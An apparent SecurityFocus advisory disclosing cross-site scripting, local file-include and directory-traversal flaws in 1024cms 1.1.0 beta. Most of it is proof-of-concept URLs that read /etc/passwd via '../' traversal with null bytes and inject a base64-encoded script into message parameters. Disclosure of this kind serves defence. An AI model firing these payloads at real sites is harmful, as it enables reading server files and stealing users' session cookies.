18 lines
No EOL
1.4 KiB
Text
18 lines
No EOL
1.4 KiB
Text
source: https://www.securityfocus.com/bid/47282/info
|
|
|
|
1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability
|
|
|
|
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.
|
|
|
|
1024cms 1.1.0 beta is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
|
|
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
|
|
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
|
|
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
|
|
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
|
|
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
|
|
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
|
|
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
|
|
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
|
|
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b |